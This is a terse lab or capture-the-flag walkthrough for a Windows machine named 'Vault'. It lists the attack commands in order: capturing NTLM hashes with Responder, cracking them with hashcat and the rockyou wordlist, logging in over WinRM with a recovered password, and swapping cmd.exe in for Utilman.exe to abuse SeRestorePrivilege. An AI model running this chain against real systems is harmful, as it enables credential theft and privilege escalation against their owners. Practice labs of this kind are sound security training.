Vault

445

sudo responder -A -I tun0
hashcat -m 5600 hashes.txt '/home/aditya/Documents/Kali/rockyou.txt' -O
evil-winrm -i 192.168.182.172 -u anirudh -p SecureHM

We have SeRestorePrivilege so we can access all files:

ren "C:/Windows/System32/Utilman.exe" Utilman.old
ren "C:/Windows/System32/cmd.exe" Utilman.exe

Last updated